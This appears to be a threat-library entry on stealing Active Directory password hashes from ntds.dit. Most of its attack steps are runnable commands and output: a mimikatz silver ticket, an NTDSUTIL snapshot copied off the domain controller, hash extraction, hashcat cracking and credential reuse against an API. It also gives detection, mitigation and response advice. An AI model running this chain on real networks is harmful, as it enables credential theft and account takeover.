Ntds.dit Password Extraction

All data in Active Directory is stored in the file ntds.dit (by default located in C:\Windows\NTDS\) on every domain controller. Amongst other kinds of information, “the dit” contains user accounts and their password hashes, which can be used by an adversary in other stages of their attack. Cracking user passwords is beneficial even if an adversary has already obtained domain dominance, as users frequently share passwords across domain-joined and non-domain-joined systems and applications.

To gain access to the ntds.dit file on a domain controller, an adversary must have already gained administrator access to Active Directory. Alternatively, an adversary could compromise the enterprise backup solution responsible for backing up domain controllers, and copy ntds.dit from a backup. Most organizations do not frequently rotate the krbtgt secret (see Golden Ticket) so even older backups can be useful.

Threat Summary

Target: Active Directory
ATT&CK® Tactic:
ATT&CK Technique:

Difficulty
Detection: Medium
Mitigation: Medium
Response: Hard

NTDS.dit Password Extraction

Step 1: An adversary must possess access to a domain controller’s file system before they are able to extract ntds.dit. As this requirement makes ntds.dit extraction a late-stage attack, an adversary could use a previously compromised domain controller computer account’s password hash to create a silver ticket.

PS> .\mimikatz.exe "kerberos::golden /user:FakeUser1 /domain:domain.com /sid:S-1-5-21-441320023-234525631-506766575 /id:S-1-5-21-441320023-234525631-506766575-1000 /target:DC1.domain.com /service:HOST /RC4:be3710380a7600e825a2d9ef4ae0fcf0 /ptt" "misc::cmd"
User      : FakeUser1
Domain    : domain.com (DOMAIN)
SID       : S-1-5-21-441320023-234525631-506766575
User Id   : 0
Groups Id : *513 512 520 518 519
ServiceKey: be3710380a7600e825a2d9ef4ae0fcf0 - rc4_hmac_nt
Service   : HOST
Target    : DC1.domain.com
Lifetime  : 31/07/2020 11:13:28 ; 29/07/2030 11:13:28 ; 29/07/2030 11:13:28
-> Ticket : ** Pass The Ticket **
 
 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated
 
Golden ticket for 'FakeUser1 @ domain.com' successfully submitted for current session
 
mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF7FB1F4320
 
# A new command prompt window opens
C:\Windows\System32> 

Step 2: Next, with access to a domain controller’s file system, the adversary can exfiltrate ntds.dit and the HKEY_LOCAL_MACHINE\SYSTEM registry hive, which is required to obtain the Boot Key for decrypting ntds.dit. While running, Active Directory maintains a file system lock on the ntds.dit file, which means simply attempting to copy it will fail. There are multiple ways around this constraint, however: 1) stop Active Directory, though this is likely to get them detected; 2) use the Volume Shadow Copy Service (VSS) to snapshot the volume, and extract ntds.dit from the snapshot; 3) use built-in tools like NTDSUtil.exe or DSDBUtil.exe; or 4) use PowerShell tools like PowerSploit’s Invoke-NinjaCopy.

PS> .\PSExec.exe \\dc1.domain.com cmd
 
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
 
 
Microsoft Windows [Version 10.0.17763.1339]
(c) 2018 Microsoft Corporation. All rights reserved.
 
DC1 > NTDSUTIL "Activate Instance NTDS" "IFM" "Create Full S:\Files" "q" "q"
NTDSUTIL: Activate Instance NTDS
Active instance set to "NTDS".
NTDSUTIL: IFM
ifm: Create Full S:\Files
Creating snapshot...
Snapshot set {3bacc31c-e2cb-4508-b0bf-5b4ec62f7c68} generated successfully.
Snapshot {6bfb4e7a-4c5a-42d2-8bd4-cc5f368de171} mounted as C:\$SNAP_202007311120_VOLUMES$\
Snapshot {328aa5f1-7f8f-4a0c-813c-573100a11e92} mounted as C:\$SNAP_202007311120_VOLUMEC$\
Initiating DEFRAGMENTATION mode...
     Source Database: C:\$SNAP_202007311120_VOLUMES$\Windows\NTDS\ntds.dit
     Target Database: S:\Files\Active Directory\ntds.dit
 
                  Defragmentation  Status (% complete)
 
          0    10   20   30   40   50   60   70   80   90  100
          |----|----|----|----|----|----|----|----|----|----|
          ...................................................
 
Copying registry files...
Copying S:\Files\registry\SYSTEM
Copying S:\Files\registry\SECURITY
Snapshot {6bfb4e7a-4c5a-42d2-8bd4-cc5f368de171} unmounted.
Snapshot {328aa5f1-7f8f-4a0c-813c-573100a11e92} unmounted.
IFM media created successfully in S:\Files
ifm: q
NTDSUTIL: q
 
DC1 > Copy S:\Files \\wks2\Share

Step 3: Once the adversary has exfiltrated ntds.dit and the HKLM\SYSTEM registry hive, they no longer require access to the organization’s network. An adversary interested in cracking the passwords will often want to run the brute-force attack with a computer optimized for that purpose, but first they’ll need to extract the hashes from ntds.dit. The DSInternals PowerShell module provides the Get-BootKey and Get-ADDBAccount cmdlets for this purpose.

$Key = Get-BootKey -SystemHiveFilePath C:\IFM\registry\SYSTEM
 
Get-ADDBAccount -BootKey $Key -DatabasePath 'C:\IFM\Active Directory\ntds.dit' -All |
  Format-Custom -View HashcatNT | 
  Out-File C:\Hashdump.txt
 
 
PS> Get-Content C:\Hashdump.txt
 
f8ae01fc52f45dda7baf7a67721665f1
eed224b4784bb040aab50b8856fe9f02
# --- Output Truncated --- #

Step 4: Now that the adversary has acquired password hashes, they are able to put them to use. They could use the hashes themselves in pass-the-hash attacks within the environment (perhaps as a means of persistence), but more likely they will seek to crack these passwords for use in credential stuffing attacks against non-domain joined systems. In this example, the adversary cracks the hashes to obtain plaintext passwords and uses them to authenticate to a SaaS application’s API.

PS> .\hashcat.exe -m 1000 -a 3 --custom-charset1=?l?d?u --username -o cracked.txt .\Hashdump.txt ?1?1?1?1?1?1?1?1
Session..........: hashcat
Status...........: Running
Hash.Name........: NTLM
Hash.Target......: .\Hashdump.txt
Time.Started.....: Thu Aug 06 10:28:13 2020 (23 hours, 56 mins)
Time.Estimated...: Fri Aug 07 14:10:45 2020 (3 hours, 45 mins)
Guess.Mask.......: ?1?1?1?1?1?1?1?1 [8]
Guess.Charset....: -1 ?l?d?u, -2 Undefined, -3 Undefined, -4 Undefined
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2165.2 MH/s (9.16ms) @ Accel:16 Loops:256 Thr:1024 Vec:1
Recovered........: 1/41 (2.44%) Digests
Progress.........: 189030831226880/218340105584896 (86.58%)
Rejected.........: 0/189030831226880 (0.00%)
Restore.Point....: 793149440/916132832 (86.58%)
Restore.Sub.#1...: Salt:0 Amplifier:13312-13568 Iteration:0-256
Candidates.#1....: TNAZRwMl -> FYNkI2Jx
Hardware.Mon.#1..: Temp: 84c Fan: 82% Util: 97% Core:1265MHz Mem:2504MHz Bus:16
 
PS> Get-Content .\cracked.txt
 
852e811a65d732c83214b4ff705d777a:F8qN47F1
 
PS>   # Attacker now uses the cracked passwords to authenticate with the username and password to a SaaS application's API
PS>   $Username = "User1" # This is the user with the hash 852e811a65d732c83214b4ff705d777a which was cracked
PS>   $Password = "F8qN47F1" # This is the password copied from the cracked.txt
PS>   $Object = New-Object -TypeName psobject
PS>   $Object | Add-Member -MemberType NoteProperty -Name "login" -Value $Username
PS>   $Object | Add-Member -MemberType NoteProperty -Name "password" -Value $Password
PS>   $url = "https://service.url/api/login"
PS>   $body = $Object | ConvertTo-Json
PS>   $Header = @{ "accept" = "text/json"}
PS>   $Response = Invoke-RestMethod -URI $url -Method POST -header $Header -Body $body -ContentType "application/json"
 
PS>   $Headers = @{ 'Authorization' = "Bearer $Response" }
PS>   $url = "https://service.url/api/DoThings"
PS>   $Response = Invoke-RestMethod -Uri $url -Method Get -Headers $Headers
PS>   $Response
{ "statusCode": 200, "statusMessage": "Things Done!" }

Detect, Mitigate, and Respond

Detection difficulty: Medium

Detecting attempts to access ntds.dit is possible using the Windows event log. Event IDs 4663 and 4656, from the Audit File System subcategory, can be used to audit file system access. Use these events to monitor for both regular and Volume Shadow Copy attempts to read or modify ntds.dit.
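The monitoring described above can be sketched as a triage filter over exported Security-log event XML. This is an added example, not part of the original page: the sample events are constructed, and the allow-list containing only lsass.exe is an assumption to adjust per environment.

```python
import re
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
WATCHED_IDS = {"4656", "4663"}  # handle requested / object accessed
NTDS_FILE = re.compile(r"\\ntds\.dit$", re.IGNORECASE)
# Snapshot paths: raw VSS device names and the $SNAP_ mount points ntdsutil creates.
SNAPSHOT = re.compile(r"HarddiskVolumeShadowCopy\d+|\\\$SNAP_", re.IGNORECASE)
# Assumption: on this DC only lsass.exe legitimately opens the live database.
EXPECTED_PROCESSES = {r"c:\windows\system32\lsass.exe"}

def parse_event(xml_text):
    """Return (EventID, {EventData name: value}) from one event's XML."""
    root = ET.fromstring(xml_text)
    event_id = root.findtext("e:System/e:EventID", namespaces=NS)
    data = {d.get("Name"): d.text or "" for d in root.iterfind("e:EventData/e:Data", NS)}
    return event_id, data

def flag_ntds_access(xml_events):
    """Flag ntds.dit access by unexpected processes or through a snapshot."""
    alerts = []
    for xml_text in xml_events:
        event_id, data = parse_event(xml_text)
        path = data.get("ObjectName", "")
        if event_id not in WATCHED_IDS or not NTDS_FILE.search(path):
            continue
        process = data.get("ProcessName", "")
        via_snapshot = bool(SNAPSHOT.search(path))
        if process.lower() in EXPECTED_PROCESSES and not via_snapshot:
            continue  # normal directory service activity on the live file
        alerts.append({"event_id": event_id, "user": data.get("SubjectUserName", ""),
                       "process": process, "path": path, "via_snapshot": via_snapshot})
    return alerts

# Constructed sample events (not real logs), built by a small helper.
def _sample(event_id, user, process, path):
    fields = {"SubjectUserName": user, "ObjectName": path, "ProcessName": process}
    body = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in fields.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID></System>'
            f"<EventData>{body}</EventData></Event>")

SAMPLE_EVENTS = [
    _sample(4663, "DC1$", r"C:\Windows\System32\lsass.exe", r"C:\Windows\NTDS\ntds.dit"),
    _sample(4663, "FakeUser1", r"C:\Windows\System32\ntdsutil.exe", r"C:\$SNAP_202007311120_VOLUMEC$\Windows\NTDS\ntds.dit"),
    _sample(4656, "FakeUser1", r"C:\Windows\System32\cmd.exe", r"\Device\HarddiskVolumeShadowCopy3\Windows\NTDS\ntds.dit"),
    _sample(4663, "DC1$", r"C:\Windows\System32\lsass.exe", r"C:\Windows\NTDS\edb.log"),
]

if __name__ == "__main__":
    print(*flag_ntds_access(SAMPLE_EVENTS), sep="\n")
```

These events are only written when Audit File System is enabled and the file carries an auditing entry (SACL), so confirm both on every domain controller before relying on the filter.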

Mitigation difficulty: Medium

To mitigate the risk of password extraction from ntds.dit, one must ensure that adversaries do not obtain the privileges necessary to compromise domain controllers in the first place.

  • Routinely audit administrative access to Active Directory, including Group Policy rights and audit configuration for logons to domain controllers.
  • Rigorously follow the clean source principle for domain controllers. All infrastructure on which domain controllers run (e.g. ESX and attached storage) and all applications that service domain controllers (e.g. backup solutions) must be at the same security level as the domain controllers themselves.
  • The physical security of the computers running domain controllers is also important. In areas where physical security cannot be assured, consider running read-only domain controllers to limit the exposure of passwords.
  • Do not allow users to possess administrative privileges across security boundaries. For example, an adversary who initially compromises a workstation should not be able to escalate privileges to move from a workstation to a server or domain controller.

Response difficulty: Hard

If compromise of ntds.dit is expected, a full compromise of Active Directory must also be assumed (i.e. the krbtgt secret was also compromised).

  • Activate the incident response process and alert the response team. Recovery from a full compromise of Active Directory requires significant planning and effort.